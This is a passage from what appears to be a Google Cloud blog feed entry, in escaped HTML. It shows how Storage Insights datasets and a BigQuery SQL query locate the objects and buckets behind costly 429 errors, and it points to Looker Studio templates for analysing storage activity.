&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Your team sees a spike in 429 (too many requests) errors. In a massive environment, this is rarely just a performance hiccup — it’s expensive! These errors trigger automatic retries, which often lead to a cycle of high-frequency, billable operations that drive up your Class A costs. Pinpointing exactly which object or prefix is causing this can be a time-consuming troubleshooting nightmare.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The new Storage Insights datasets views provide granular details on these errors, right in BigQuery. You can query for 429 errors and see exactly which objects and prefixes are under pressure.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The outcome:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Additionally, you can pinpoint the &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;cause&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; of your 429 errors, moving your team from troubleshooting to resolution.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, here’s a SQL query to analyze 429s occurring across your estate, where they are happening and why: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT\r\n  requestOperation,\r\n  errorReason,\r\n  objectName,\r\n  bucketName,\r\n  requestCompletionTimestamp,\r\n  project\r\nFROM\r\n  `[project]`.`[dataset]`.`object_events_view` \r\nWHERE\r\n  responseStatus = 429\r\nORDER BY\r\n  requestCompletionTimestamp DESC;\r\n\r\n\r\n//Running queries in Datasets accrues BQ query costs, refer to the pricing page for further details.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f137999be50&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Getting started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As your organization grows with Google Cloud, the scale of your data will only increase. Stop relying on archival data and start optimizing your organization’s storage estate. Cloud Storage Storage Insights datasets with activity insights turn massive data estates from  complex operational challenges into clearly understood, highly optimized assets.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To get started, check out use our pre-configured Looker Studio template &lt;/span&gt;&lt;a href="https://lookerstudio.google.com/c/u/0/reporting/670eee3f-ad6d-45ea-a169-853ab023dc84/page/p_k94oydxikd" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to connect to your dataset for quick analysis and value: &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example: View the trend for Total Reads on your bucket over time&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_hJhCdWP.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Or, analyze the ingress and egress traffic patterns for your bucket: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_G8F8tZ4.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to turn insight into action?&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Enable &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/storage-intelligence/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; today in the Google Cloud console.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/insights/datasets"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Configure your dataset today&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and query your data directly in BigQuery or &lt;/span&gt;&lt;a href="https://bit.ly/si-template" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;connect to our Looker template&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for quick and easy visualization.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Reference our videos for more information on &lt;/span&gt;&lt;a href="https://youtu.be/3makK6m8sIw?si=-BjdpU2ErtZGXwSA" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://youtu.be/r5Z_z1bgcw0?si=mkFxaY939Tkq9p6A" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;How to Get Started&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Read more about how to &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/storage-data-transfer/storage-insights-datasets-optimizes-storage-footprint?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;optimize your Cloud Storage footprint with Storage Insights datasets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/storage-data-transfer/analyze-cloud-storage-estates-with-storage-insights-datasets/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-09T16:00:00+00:00</published>
  </entry>
</feed>
